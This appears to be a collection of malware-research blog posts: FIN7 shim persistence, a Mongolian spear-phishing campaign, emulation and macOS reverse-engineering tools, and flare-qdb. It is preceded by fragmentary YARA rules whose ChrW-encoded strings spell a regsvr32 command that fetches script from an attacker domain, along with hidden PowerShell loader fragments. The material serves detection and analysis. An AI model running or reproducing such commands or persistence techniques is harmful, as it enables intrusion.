       $ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46) & ChrW(101)" ascii wide
       $ob2 = "ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(115) & ChrW(32) & ChrW(47) & ChrW(110) & ChrW(32) & ChrW(47)" ascii wide
       $ob3 = "ChrW(117) & ChrW(32) & ChrW(47) & ChrW(105) & ChrW(58) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(115)" ascii wide
       $ob4 = "ChrW(58) & ChrW(47) & ChrW(47) & ChrW(108) & ChrW(121) & ChrW(110) & ChrW(99) & ChrW(100) & ChrW(105) & ChrW(115)" ascii wide
       $ob5 = "ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(46) & ChrW(50) & ChrW(98) & ChrW(117) & ChrW(110)" ascii wide
       $ob6 = "ChrW(110) & ChrW(121) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) & ChrW(65) & ChrW(117) & ChrW(116)" ascii wide
       $ob7 = "ChrW(111) & ChrW(100) & ChrW(105) & ChrW(115) & ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(32)" ascii wide
       $ob8 = "ChrW(115) & ChrW(99) & ChrW(114) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(46) & ChrW(100) & ChrW(108) & ChrW(108)" ascii wide
       $obreg1 = /(\w{5}\s&\s){7}\w{5}/
       $obreg2 = /(Chrw\(\d{1,3}\)\s&\s){7}/
       // wscript
       $wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii wide
       $wsobj2 = "Obj.Run " ascii wide

                      (uint16(0) != 0x5A4D)
                      all of ($wsobj*) and 3 of ($ob*)
                      all of ($wsobj*) and all of ($obreg*)


       author=" @TekDefense"
       description="This rule was written to hit on specific variables and powershell command fragments as seen in the macro found in the XLSX file3a1dca21bfe72368f2dd46eb4d9b48c4."
       // Setting the environment
       $env1 = "Arch = Environ(\"PROCESSOR_ARCHITECTURE\")" ascii wide
       $env2 = "windir = Environ(\"windir\")" ascii wide
       $env3 = "windir + \"\\syswow64\\windowspowershell\\v1.0\\powershell.exe\"" ascii wide
       // powershell command fragments
       $ps1 = "-NoP" ascii wide
       $ps2 = "-NonI" ascii wide
       $ps3 = "-W Hidden" ascii wide
       $ps4 = "-Command" ascii wide
       $ps5 = "New-Object IO.StreamReader" ascii wide
       $ps6 = "IO.Compression.DeflateStream" ascii wide
       $ps7 = "IO.MemoryStream" ascii wide
       $ps8 = ",$([Convert]::FromBase64String" ascii wide
       $ps9 = "ReadToEnd();" ascii wide
       $psregex1 = /\W\w+\s+\s\".+\"/
                      (uint16(0) != 0x5A4D)
                      all of ($env*) and 6 of ($ps*)
                      all of ($env*) and 4 of ($ps*) and all of ($psregex*)


        description="Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDOTcom"

        $header = "{\\rt"

        $lnkinfo = "4c0069006e006b0049006e0066006f"

        $encoded1 = "4f4c45324c696e6b"
        $encoded2 = "52006f006f007400200045006e007400720079"
        $encoded3 = "4f0062006a0049006e0066006f"
        $encoded4 = "4f006c0065"

        $http1 = "68{"
        $http2 = "74{"
        $http3 = "07{"

        $domain1 = "32{\\"
        $domain2 = "62{\\"
        $domain3 = "75{\\"
        $domain4 = "6e{\\"
        $domain5 = "79{\\"
        $domain6 = "2e{\\"
        $domain7 = "63{\\"
        $domain8 = "6f{\\"
        $domain9 = "6d{\\"

        $datastore = "\\*\\datastore"

        $header at 0 and all of them


Joshua Kim, Nick Carr, Gerry Stellatos, Charles Carmakal, TJ Dahms, Nick Richard, Barry Vengerik, Justin Prosco, Christopher Glyer

To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence

In 2017, Mandiant responded to multiple incidents we attribute to FIN7, a financially motivated threat group associated with malicious operations dating back to 2015. Throughout the various environments, FIN7 leveraged the CARBANAK backdoor, which this group has used in previous operations.

A unique aspect of the incidents was how the group installed the CARBANAK backdoor for persistent access. Mandiant identified that the group leveraged an application shim database to achieve persistence on systems in multiple environments. The shim injected a malicious in-memory patch into the Services Control Manager (“services.exe”) process, and then spawned a CARBANAK backdoor process.

Mandiant identified that FIN7 also used this technique to install a payment card harvesting utility for persistent access. This was a departure from FIN7’s previous approach of installing a malicious Windows service for process injection and persistent access.

Application Compatibility Shims Background

According to Microsoft, an application compatibility shim is a small library that transparently intercepts an API (via hooking), changes the parameters passed, handles the operation itself, or redirects the operation elsewhere, such as additional code stored on a system. Today, shims are mainly used for compatibility purposes for legacy applications. While shims serve a legitimate purpose, they can also be used in a malicious manner. Mandiant consultants previously discussed shim databases at both BruCon and BlackHat.

Shim Database Registration

There are multiple ways to register a shim database on a system. One technique is to use the built-in “sdbinst.exe” command line tool. Figure 1 displays the two registry keys created when a shim is registered with the “sdbinst.exe” utility.

Figure 1: Shim database registry keys

Once a shim database has been registered on a system, the shim database file (“.sdb” file extension) will be copied to the “C:\Windows\AppPatch\Custom” directory for 32-bit shims or “C:\Windows\AppPatch\Custom\Custom64” directory for 64-bit shims.

Malicious Shim Database Installation

To install and register the malicious shim database on a system, FIN7 used a custom Base64 encoded PowerShell script, which ran the “sdbinst.exe” utility to register a custom shim database file containing a patch onto a system. Figure 2 provides a decoded excerpt from a recovered FIN7 PowerShell script showing the parameters for this command.

Figure 2: Excerpt from a FIN7 PowerShell script to install a custom shim

FIN7 used various naming conventions for the shim database files that were installed and registered on systems with the “sdbinst.exe” utility. A common observance was the creation of a shim database file with a “.tmp” file extension (Figure 3).

Figure 3: Malicious shim database example

Upon registering the custom shim database on a system, a file named with a random GUID and an “.sdb” extension was written to the 64-bit shim database default directory, as shown in Figure 4. The registered shim database file had the same MD5 hash as the file that was initially created in the “C:\Windows\Temp” directory.

Figure 4: Shim database after registration

In addition, specific registry keys were created that correlated to the shim database registration.  Figure 5 shows the keys and values related to this shim installation.

Figure 5: Shim database registry keys

The database description used for the shim database registration, “Microsoft KB2832077” was interesting because this KB number was not a published Microsoft Knowledge Base patch. This description (shown in Figure 6) appeared in the listing of installed programs within the Windows Control Panel on the compromised system.

Figure 6: Shim database as an installed application

Malicious Shim Database Details

During the investigations, Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of “services.exe” with their CARBANAK payload. This occurred when the “services.exe” process executed at startup. The shim database file contained shellcode for a first stage loader that obtained an additional shellcode payload stored in a registry key. The second stage shellcode launched the CARBANAK DLL (stored in a registry key), which spawned an instance of Service Host (“svchost.exe”) and injected itself into that process.  

Figure 7 shows a parsed shim database file that was leveraged by FIN7.

Figure 7: Parsed shim database file

For the first stage loader, the patch overwrote the “ScRegisterTCPEndpoint” function at relative virtual address (RVA) “0x0001407c” within the services.exe process with the malicious shellcode from the shim database file. 

The new “ScRegisterTCPEndpoint” function (shellcode) contained a reference to the path of “\REGISTRY\MACHINE\SOFTWARE\Microsoft\DRM”, which is a registry location where additional malicious shellcode and the CARBANAK DLL payload was stored on the system.

Figure 8 provides an excerpt of the parsed patch structure within the recovered shim database file.

Figure 8: Parsed patch structure from the shim database file

The shellcode stored within the registry path “HKLM\SOFTWARE\Microsoft\DRM” used the API function “RtlDecompressBuffer” to decompress the payload. It then slept for four minutes before calling the CARBANAK DLL payload's entry point on the system. Once loaded in memory, it created a new process named “svchost.exe” that contained the CARBANAK DLL. 

Bringing it Together

Figure 9 provides a high-level overview of a shim database being leveraged as a persistent mechanism for utilizing an in-memory patch, injecting shellcode into the 64-bit version of “services.exe”.

Figure 9: Shim database code injection process


Mandiant recommends the following to detect malicious application shimming in an environment:

  1. Monitor for new shim database files created in the default shim database directories of “C:\Windows\AppPatch\Custom” and “C:\Windows\AppPatch\Custom\Custom64”
  2. Monitor for registry key creation and/or modification events for the keys of “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom” and “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB”
  3. Monitor process execution events and command line arguments for malicious use of the “sdbinst.exe” utility 

Writing a libemu/Unicorn Compatability Layer

In this post we are going to take a quick look at what it takes to write a libemu compatibility layer for the Unicorn engine. In the course of this work, we will also import the libemu Win32 environment to run under Unicorn.

For a bit of background, libemu is a lightweight x86 emulator written in C by Paul Baecher and Markus Koetter. It was released in 2007 and includes a built-in Win32 environment that allows shellcodes to resolve API at runtime. The library also provides end users with a convenient way to receive callbacks when API functions are hit. The original project supported 5 Windows dlls, 51 hooks and 234 opcodes all wrapped in a tight 1mb package. Unfortunately it is no longer being updated.

In late 2015, we saw the Unicorn engine project released by Nguyen Anh Quynh and Dang Hoang Vu. This project takes the processor emulators from QEMU and wraps them into an easy to use library. Unicorn, however, does not provide a Win32 layer.

As an experiment, we were curious to see what it would take to bring the libemu Win32 environment into Unicorn. This task actually turned out to be quite simple since it was nicely self contained. In the process of exploring this it also made sense to write a basic shim layer to support the libemu API and translate its inner workings over to Unicorn.

Lets start with the common libemu API:

The API is actually very similar to Unicorn:

The major differences are that Unicorn does everything through an opaque uc_engine* handle, while libemu uses a series of structs such as emu, emu_cpu, and emu_memory:

In general, the emu and emu_memory structures are passed directly as arguments to API wrappers such as emu_cpu_get, emu_memory_get and the emu_memory_read/write functions. There is one common case of direct member access to the emu_cpu structure that requires some special attention. This structure gives the user direct read/write access to the emulator’s virtual processor and is commonly utilized by user code. Examples to support include:

The next task was to see if we could mimic the direct access to the emu_cpu elements as if they were static struct fields. Here we enter the world of C++ operator overloading.

With these tasks complete, porting existing code from libemu over to Unicorn should be a pretty straightforward task.

In Figure 1 we see an initial test, we put together that includes the Win32 environment, shim layer, several API hooks and a hard coded payload.

Figure 1: Initial test of the libemu Win32 environment and hooks running under Unicorn

With this working, the next stage was to try it out against a larger code base. Here we imported the userhooks.cpp from scdbg, an extension of the libemu sctest that includes some 250 API hooks. As it turns out, very few changes were required to get it working.

In Figure 2, we can see the results of testing it against a fairly complex shellcode that:

  • allocates virtual memory
  • copies code to the new alloc
  • creates a new thread
  • downloads an executable
  • checks the registry for the presence of Antivirus software

Note that while this shellcode would normally do process injection, scdbg handles it all inline for simplified analysis.

Figure 2: Complex shellcode running with hooks imported from scdbg

Another large feature to test was the scdbg debug shell. When testing software in an emulated environment, having interactive debug tools available is extremely handy.

Figure 3 shows an example of setting a breakpoint, single stepping, and examining memory of code running in the emulator.

Figure 3: Imported scdbg debug shell running with Unicorn Engine and libemu shim layer


In this article we took a quick look at the differences between the libemu and Unicorn emulators API. This allowed us to create a shim layer to import legacy libemu code and use it with Unicorn largely unchanged.

Once the shim layer was in place, we next imported the libemu Win32 Environment so we could run it under Unicorn.

As a final test we ported several large portions of the scdbg project, which was originally written to run under libemu. Here our previous work allowed for the importation of scdbg's 250+ API hooks and debug shell to run under Unicorn with only minimal changes.

Overall the entire process went quite smoothly and should provide benefits for developers of libemu and/or Unicorn. If you would like to experiment for yourself you can download a copy of our test project here.

Introduction to Reverse Engineering Cocoa Applications

While not as common as Windows malware, there has been a steady stream of malware discovered over the years that runs on the OS X operating system, now rebranded as macOS. February saw three particularly interesting publications on the topic of macOS malware: a Trojan Cocoa application that sends system information including keychain data back to the attacker, a macOS version of APT28’s Xagent malware, and a new Trojan ransomware.

In this blog, the FLARE team would like to introduce two small tools that can aid in the task of reverse engineering Cocoa applications for macOS. In order to properly introduce these tools, we will lay a bit of foundation first to introduce the reader to some Apple-specific topics. Specifically, we will explain how the Objective-C runtime complicates code analysis in tools such as IDA Pro, and how to find useful entry points into a Cocoa application’s code where you can begin analysis.

If you find these topics fascinating or if you want to be better prepared to investigate macOS malware in your own environment, come join us for a two-day crash course on this topic that we will be teaching at Black Hat Asia and Black Hat USA this year.

Cocoa Application Anatomy

When we use the term “Cocoa application”, we are referring to an application that is built using the AppKit framework, which belongs to what Apple refers to as the Cocoa Application Layer. In macOS, applications are distributed in an application bundle, a directory structure made to appear as a single file containing executable code and its associated resources, as illustrated in Figure 1.  

Figure 1: Directory structure of iTerm application bundle

These bundles can contain a variety of different files, but all bundles must contain at least two critical files: Info.plist and an executable file residing in the MacOS folder. The executable file can be any file with execute permissions, even a python or shell script, but it is typically a native executable. Mach-O is the native executable file format for macOS and iOS. The Info.plist file describes the application bundle, containing critical information the OS needs in order to properly load it. Plist files can be in one of three possible formats: XML, JSON, or a proprietary binary format called bplist. A handy utility named plutil is available in macOS that allows you to convert between formats, or simply pretty-print a plist file regardless of its format. The most notable key in the Info.plist file is the CFBundleExecutable key, which designates the name of the executable in the MacOS folder that will be executed. Figure 2 shows a snippet of the pretty-printed output from plutil for the iTerm application’s Info.plist file.

Figure 2: snippet from iTerm application’s Info.plist file


Cocoa applications are typically written in Objective-C or Swift. Swift, the newer of the two languages, has been quickly catching up to Objective-C in popularity and appears to have overtaken it. Despite this, Objective-C has many years over Swift, which means the majority of malicious Cocoa applications you will run into will be written in Objective-C for the time being. Additionally, older Objective-C APIs tend to be encountered during malware analysis. This can be due to the age of the malware or for the purpose of backwards compatibility. Objective-C is a dynamic and reflective programming language and runtime. Roughly 10 years ago, Objective-C version 2.0 was released, which included major changes to both the language and the runtime. Where details are concerned, this blog is referring to version 2.0.

Programs written in Objective-C are transformed into C as part of the compilation process, making it at least a somewhat comfortable transition for most reverse engineers. One of the biggest hurdles to such a transition comes in how methods are called in Objective-C. Objective-C methods are conceptually similar to C functions; they are a unit of code that performs a specific task, optionally taking in parameters and returning a value. However, due to the dynamic nature of Objective-C, methods are not normally called directly. Instead, a message is sent to the target object. The name of a method is called a selector, while the actual function that is executed is called an implementation. The message specifies a reference to the selector that is to be invoked along with any method parameters. This allows for features like “method swizzling,” in which an application can change the implementation for a given selector. The most common way in which messages are sent within Objective-C applications is the objc_msgSend function. Figure 3 provides a small snippet of Objective-C code that opens a URL in your browser. Figure 4 shows this same code represented in C.


Figure 3: Objective-C code snippet



Figure 4: Objective-C code represented in C

As you can see, the Objective-C code between the brackets amounts to a call to objc_msgSend.

Unfortunately, this message sending mechanism causes problems when trying to follow cross-references for selectors in IDA Pro. While you can easily see all the cross-references for a given selector from any location where it is referenced, the implementations themselves are not called or referenced directly and so there is no easy way to jump from a selector reference to its implementation or vice-versa. Figure 5 illustrates this problem by showing that the only cross-reference to an implementation is in the __objc_const section of the executable, where the runtime stores class member data.

Figure 5: Cross-reference to an implementation

Of course, the information that links these selector references to their implementations is stored in the executable, and thankfully IDA Pro can to parse this data for us. In the __objc_const section, a structure identified by IDA Pro as __objc2_meth has the definition illustrated in Figure 6.



Figure 6: __objc2_meth structure

The first field of this structure is the selector for the method. One of the cross-references to this field brings us to the __objc_selrefs section of the executable where you can find the selector reference. Following the cross-references of the selector reference will reveal to us any locations in the code where the selector is used. The third field of the structure points to the implementation of the selector, which is the function we want to analyze. What is left to do is simply use this data to create the cross-references. The first of the two tools we are introducing is an IDAPython script named that does just that for x86_64 Mach-O executable files using Objective-C 2.0. This script is similar to older IDAPython scripts released by Zynamics, however their scripts do not support the x86_64 architecture. Our script is available along with all of our other scripts and plugins for IDA Pro from our Github repo here. For each Objective-C method that is defined in the executable, patches the instructions that cross-reference its selector to reference the implementing function itself and creates a cross-reference from the referencing instruction to the implementation function. Using this script allows us to easily transition from a selector’s implementation to its references and vice-versa, as shown in Figure 7 and Figure 8.

Figure 7: Cross-references added for implementation

Figure 8: View selector’s implementation from its reference

There is a noteworthy shortcoming to this tool, however. If more than one class defines a method with the same name, there will only be one selector present in the executable. For now, the tool ignores these ambiguous selectors.

Cocoa Applications – Where to Begin Looking?

Another quandary with reverse engineering Cocoa applications, or any application built with an application framework, is determining where the framework’s code ends and the author’s code begins. With programs written in C/C++, the author’s code would typically begin within the main function of the program. While there are many exceptions to this rule, this is generally the case. For programs using the Cocoa Application template in Apple’s IDE, Xcode, the main function simply performs a tail jump into a function exported by the AppKit framework named NSApplicationMain, as shown in Figure 9.

Figure 9: A Cocoa application's main function

So where do we look to find the first lines of code written by the application’s author that would be executed? The answer to that question lies within NSApplicationMain. In summary, NSApplicationMain performs three important steps: constructing the NSApplication object, loading the main storyboard or nib file, and starting the event loop. The NSApplication object plays the important role of event and notification coordinator for the running application. NSApplicationMain looks for the name of this class in the NSPrincipalClass key in the Info.plist file of the application bundle. Xcode simply sets this key to the NSApplication class, but this class may be subclassed or reimplemented and the key overwritten. A noteworthy notification that is coordinated by the NSApplication object is NS‌Application‌Did‌Finish‌Launching‌Notification, which is designated as the proper time to run any application-specific initialization code the author may have. To handle this notification, the application may designate a delegate class that adheres to the NSApplicationDelegate protocol. In Objective-C, a protocol fills the role traditionally referred to as an interface in object-oriented parlance. The relevant method in this protocol for encapsulating initialization code is the application‌Did‌Finish‌Launching method. By default, Xcode creates this delegate class for you and names it AppDelegate. It even defines an empty applicationDidFinishLaunching method for the application developer to modify as desired. With all this information in hand, the best place to look for the initial code of most Cocoa applications is in a method named applicationDidFinishLaunching, as shown in Figure 10.

Figure 10: Search for applicationDidFinishLaunching method

If you find nothing useful, then fall back to analyzing the main function. It is important to note that all this information is specific to apps created using the Cocoa Application template in Xcode. Cocoa applications do not need to use NSApplicationMain. One can write their own Cocoa application from scratch, implementing his or her own version of NSApplicationMain.

Interface Builder and Nib Files

It was previously mentioned that one of the main responsibilities of NSApplicationMain is to load the main storyboard or nib file. “Nib” stands for NeXTSTEP Interface Builder, referring to the Interface Builder application that is a part of Xcode. Interface Builder allows developers to easily build graphical user interfaces and even wire their controls to variables and methods within their code using a graphical interface. As a developer builds GUIs with Interface Builder, graphs of objects are formed. An object graph is saved in XML format in a .xib file in the project folder. When the project is built, each object graph is serialized using the NSKeyedArchiver class and stored in Apple’s bplist format in a .nib file within the application bundle, typically under the Resources folder. Xcode writes the name of the main nib file to the application’s Info.plist file under the key NSMainNibFile. When an application loads a nib file, this object hierarchy is unpacked into memory and all the connections between various GUI windows, menus, controls, variables, and methods are established. This list of connections includes the connection between the application delegate and the NSApplication class. Storyboards were added to macOS in Yosemite. They enable the developer to lay out all of the application’s various views that will be shown to the user and specify their relationships. Under the hood, a storyboard is a directory containing nib files and an accompanying Info.plist file. The main storyboard directory is designated under the key NSMainStoryboardFile in the application’s Info.plist file.

This brings us to the other tool we would like to share,, which is available from our Github repo here. uses ccl_bplist to decode and deserialize a nib file and print out the list of connections defined within it.  For each connection, it prints the label for the connection (typically a method or variable name) and the source and destination objects’ classes. Each object encoded by NSKeyedArchiver is assigned a unique numeric identifier value that is included in the output within enclosed parentheses. For appropriate GUI elements that have textual data associated with them, such as button labels, the text is included in the script output within enclosed brackets. With this information, one can determine the relationships between the code and the GUI elements. It is even possible to rewire the application, changing which functions handle different GUI events. Note that if a nib is not flattened, it will be represented as a directory that contains nib files and you can run this tool on the keyedobjects.nib file located within it instead. For storyboards, you can run this tool on the various nib files present in the storyboard directory.  Figure 11 shows the output of when it is used on the MainMenu.nib file from the recently discovered MacDownloader threat shown in Figure 12. You may notice that the GUI text in the tool output does not match the GUI text in the screenshot. In this case, many of the GUI elements are altered at run-time in the code illustrated in Figure 13.


Figure 11: output for MacDownloader threat

Figure 12: MacDownloader's initial window

Figure 13: Code updating the text of buttons

The output from shows that the author used the default delegate class AppDelegate provided by Xcode. The AppDelegate class has two instance variables for NSButton objects along with four instance variables for NSTextField objects. A selector named btnSearchAdware is connected to the same button with id (49) as the instance variable btnAction. This is likely an interesting function to begin analysis.


We hope you have enjoyed this whirlwind tour of reverse engineering Cocoa applications. If you are interested in getting some more exposure to macOS internals and analysis tools, reverse engineering and debugging techniques, and real macOS malware found in the wild, then come hang out with us at Black Hat this year and learn more!

Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government


FireEye recently observed a sophisticated campaign targeting individuals within the Mongolian government. Targeted individuals that enabled macros in a malicious Microsoft Word document may have been infected with Poison Ivy, a popular remote access tool (RAT) that has been used for nearly a decade for key logging, screen and video capture, file transfers, password theft, system administration, traffic relaying, and more. The threat actors behind this attack demonstrated some interesting techniques, including:

  1. Customized evasion based on victim profile – The campaign used a publicly available technique to evade AppLocker application whitelisting applied to the targeted systems.
  2. Fileless execution and persistence – In targeted campaigns, threat actors often attempt to avoid writing an executable to the disk to avoid detection and forensic examination. The campaign we observed used four stages of PowerShell scripts without writing the the payloads to individual files.
  3. Decoy documents – This campaign used PowerShell to download benign documents from the Internet and launch them in a separate Microsoft Word instance to minimize user suspicion of malicious activity.
Attack Cycle

The threat actors used social engineering to convince users to run an embedded macro in a Microsoft Word document that launched a malicious PowerShell payload.

The threat actors used two publicly available techniques, an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process. The malicious payload was spread across multiple PowerShell scripts, making its execution difficult to trace. Rather than being written to disk as individual script files, the PowerShell payloads were stored in the registry.   

Figure 1 shows the stages of the payload execution from the malicious macro.

Figure 1: Stages of payload execution used in this attack

Social Engineering and Macro-PowerShell Level 1 Usage

Targets of the campaign received Microsoft Word documents via email that claimed to contain instructions for logging into webmail or information regarding a state law proposal.

When a targeted user opens the malicious document, they are presented with the messages shown in Figure 2, asking them to enable macros.

Figure 2: Lure suggesting the user to enable Macros to see content

Bypassing Application Whitelisting Script Protections (AppLocker)

Microsoft application whitelisting solution AppLocker prevents unknown executables from running on a system. In April 2016, a security researcher demonstrated a way to bypass this using regsvr32.exe, a legitimate Microsoft executable permitted to execute in many AppLocker policies. The regsvr32.exe executable can be used to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument. This technique bypasses AppLocker restrictions and permits the execution of code within the SCT file.

We observed implementation of this bypass in the macro code to invoke regsvr32.exe, along with a URL passed to it which was hosting a malicious SCT file, as seen in Figure 3.

Figure 3:  Command after de-obfuscation to bypass AppLocker via regsv32.exe

Figure 4 shows the entire command line parameter used to bypass AppLocker.

Figure 4: Command line parameter used to bypass AppLocker

We found that the malicious SCT file invokes WScript to launch PowerShell in hidden mode with an encoded command, as seen in Figure 5.

Figure 5: Content of SCT file containing code to launch encoded PowerShell

Decoding SCT: Decoy launch and Stage Two PowerShell

After decoding the PowerShell command, we observed another layer of PowerShell instructions, which served two purposes:

1.     There was code to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet. When the victim enables macros, they will see the decoy document shown in Figure 6. This document contains the content described in the spear phishing email.

Figure 6: Decoy downloaded and launched on the victim’s screen

2.     After launching the decoy document in the second winword.exe process, the PowerShell script downloads and runs another PowerShell script named f0921.ps1 as shown in Figure 7.

Figure 7: PowerShell to download and run decoy decoy document and third-stage payload

Third Stage PowerShell Persistence

The third stage PowerShell script configures an encoded PowerShell command persistently as base64 string in the HKCU: \Console\FontSecurity registry key. Figure 8 shows a portion of the PowerShell commands for writing this value to the registry.

Figure 8: Code to set registry with encoded PowerShell script

Figure 9 shows the registry value containing encoded PowerShell code set on the victims’ system.

Figure 9: Registry value containing encoded PowerShell script

Figure 10 shows that using Start-Process, PowerShell decodes this registry and runs the malicious code.

Figure 10: Code to decode and run malicious content from registry

The third stage PowerShell script also configures another registry value  named HKCU\CurrentVersion\Run\SecurityUpdate to launch the encoded PowerShell payload stored in the HKCU: \Console\FontSecurity key. Figure 11 shows the code for these actions. This will execute the PowerShell payload when the user logs in to the system.

Figure 11: PowerShell registry persistence

Fourth Stage PowerShell Inject-LocalShellCode

The HKCU\Console\FontSecurity registry contains the fourth stage PowerShell script, shown decoded in Figure 12. This script borrows from the publicly available Inject-LocalShellCode PowerShell script from PowerSploit to inject shellcode.

Figure 12: Code to inject shellcode

Shellcode Analysis

The shellcode has a custom XOR based decryption loop that uses a single byte key (0xD4), as seen in Figure 13.

Figure 13: Decryption loop and call to decrypted shellcode

After the shellcode is decrypted and run, it injects a Poison Ivy backdoor into the userinit.exe as shown in Figure 14.

Figure 14: Code injection in userinit.exe and attempt to access Poison Ivy related DAT files

In the decrypted shellcode, we also observed content and configuration related to Poison Ivy.  Correlating these bytes to the standard configuration of Poison Ivy, we can observe the following:

  • Active setup – StubPath
  • Encryption/Decryption key - version2013
  • Mutex name - 20160509                 

The Poison Ivy configuration dump is shown in Figure 15.

Figure 15: Poison Ivy configuration dump


Although Poison Ivy has been a proven threat for some time, the delivery mechanism for this backdoor uses recent publicly available techniques that differ from previously observed campaigns. Through the use of PowerShell and publicly available security control bypasses and scripts, most steps in the attack are performed exclusively in memory and leave few forensic artifacts on a compromised host.

FireEye HX Exploit Guard is a behavior-based solution that is not affected by the tricks used here. It detects and blocks this threat at the initial level of the attack cycle when the malicious macro attempts to invoke the first stage PowerShell payload. HX also contains generic detections for the registry persistence, AppLocker bypasses and subsequent stages of PowerShell abuse used in this attack.

FLARE Script Series: Querying Dynamic State using the FireEye Labs Query-Oriented Debugger (flare-qdb)


This post continues the FireEye Labs Advanced Reverse Engineering (FLARE) script series. Here, we introduce flare-qdb, a command-line utility and Python module based on vivisect for querying and altering dynamic binary state conveniently, iteratively, and at scale. flare-qdb works on Windows and Linux, and can be obtained from the flare-qdb github project.


Efficiently understanding complex or obfuscated malware frequently entails debugging. Often, the linear process of following the program counter raises questions about parallel or previous register states, state changes within a loop, or if an instruction will ever be executed at all. For example, a register’s value may not become interesting until the analyst learns it was an important input to a function that has already been executed. Restarting a debug session and cataloging the results can take the analyst out of the original thought process from which the question arose.

A malware analyst must constantly judge whether such inquiries will lend indispensable observations or extraneous distractions. The wrong decision wastes precious time. It would be useful to query malware state like a database, similar to the following:

SELECT eax, poi(ebp-0x14) FROM malware.exe WHERE eip = 0x401072

FLARE has devised a command-line tool to efficiently query dynamic state and more in a similar fashion. The following is a description of this tool with examples of how it has been used within FLARE to analyze malware, simulate new scenarios, and even solve challenges from the 2016 FLARE-On challenge.


Drawing heavily from vivisect, flare-qdb is an open source tool for efficiently posing sophisticated questions and obtaining simple answers from binaries. flare-qdb’s command-line syntax is as follows:

flareqdb "<cmdline>" -at <address> "<python>"

flare-qdb allows an analyst to execute a command line of their choosing, break on arbitrary program counter values, optionally check conditions, and display or alter program state with ad-hoc Python code. flare-qdb implements several WinDbg-like builtins for querying and modifying state. Table 1 lists a few illustrative example queries.

Experiment or Alteration


What two DWORD arguments are passed to kernel32!Beep? (WinDbg analog: dd)

-at kernel32.Beep "dd('esp+4', 2)"

Terminate if eax is null at 0x401072 (WinDbg analog: .kill)

-at-if 0x401072 eax==0 "kill()"

Alter ecx programmatically (WinDbg analog: r)

-at malwaremodule+0x102a "r('ecx', '(ebp-0x14)*eax')

Alter memory programmatically

-at 0x401003 "memset('ebp-0x14', 0x2a, 4)"

Table 1: Example flare-qdb queries

Using the flareqdb Command Line

The usefulness of flare-qdb can be seen in cases such as loops dealing with strings. Figure 1 shows the flareqdb command line utility being used to dump the Unicode string pointed to by a stack variable for each iteration of a loop. The output reveals that the variable is used as a runner pointer iterating through argv[1].

Figure 1: Using flareqdb to monitor a string within a loop

Another example is challenge 4 from the 2016 FLARE-On Challenge (spoiler alert: partial solution presented below, full walkthrough is here).

In flareon2016challenge.dll, a decoded PE file contains a series of calls to kernel32!Beep that must be tracked in order to construct the correct sequence of calls to ordinal #50 in the challenge binary. Figure 2 shows a flareqdb one-liner that forwards each kernel32!Beep call to ordinal #50 in the challenge binary to obtain the flag.

Figure 2: Using flareqdb to solve challenge 4 of the 2016 FLARE-On Challenge

flareqdb can also force branches to be taken, evaluate function pointer values, and validate suspected function addresses by disassembling. For example, consider the subroutine in Figure 3, which is only invoked if a set of conditions is satisfied and which calls a C++ virtual function. Identifying this function could help the analyst identify its caller and discover what kind of data to provide through the command and control (C2) channel to exercise it.

Figure 3: Unidentified function with virtual function call

Using the flareqdb command-line utility, it is possible to divert the program counter to bypass checks on the C2 data that was provided and subsequently dump the address of the function pointer that is called by the malware at program counter 0x4029a4. Thanks to vivisect, flare-qdb can even disassemble the instructions at the resulting address to validate that it is indeed a function. Figure 4 shows the flareqdb command-line utility being used to force control flow at 0x4016b5 to proceed to 0x4016bb (not shown) and later to dump the function pointer called at 0x4029a4.

Figure 4: Forcing a branch and resolving a C++ virtual function call

The function pointer resolves to 0x402f32, which IDA has already labeled as basic_streambuf::xsputn as shown in Figure 5. This function inserts a series of characters into a file stream, which suggests a file write capability that might be exercised by providing a filename and/or file data via the C2 channel.

Figure 5: Resolved virtual function address

Using the flareqdb Python Module

flare-qdb also exists as a Python module that is useful for more complex cases. flare-qdb allows for ready use of the powerful vivisect library. Consider the logic in Figure 6, which is part of a privilege escalation tool. The tool checks GetVersionExW, NetWkstaGetInfo, and IsWow64Process before exploiting CVE-2016-0040 in WMI.

Figure 6: Privilege escalation platform check

It appears as if the tool exploits 32-bit Windows installations with version numbers 5.1+, 6.0, and 6.1. Figure 7 shows a script to quickly validate this by executing the tool 12 times, simulating different versions returned from GetVersionExW and NetWkstaInfo. Each time the script executes the malware, it indicates whether the malware reached the point of attempting the privilege escalation or not. The script passes a dictionary of local variables to the Qdb instance for each execution in order to permit the user callback to print the friendly name of each Windows version it is simulating for the binary. The results of GetVersionExW are modified prior to return using the vstruct definition of the OSVERSIONINFOEXW; NetWkstaGetInfo is fixed manually for brevity and in the absence of a definition corresponding to the WKSTA_INFO_100 structure.

Figure 7: Script to test version check

Figure 8 shows the output, which confirms the analysis of the logic from Figure 6.

Figure 8: Script output

Next, consider an example in which the analyst must devise a repeatable process to unpack a binary and ascertain the locations of unpacked PE-COFF files injected throughout memory. The script in Figure 9 does this by setting a breakpoint relative to the tail call and using vivisect’s envi module to enumerate all the RWX memory locations that are not backed by a named file. It then uses flare-qdb’s park() builtin before calling detach() so that the binary runs in an endless loop, allowing the analyst to attach a debugger and resume manual analysis.

Figure 9: Unpacker script that parks its debuggee after unpacking is complete

Figure 10 shows the script announcing the locations of the self-injected modules before parking the process in an infinite loop and detaching.

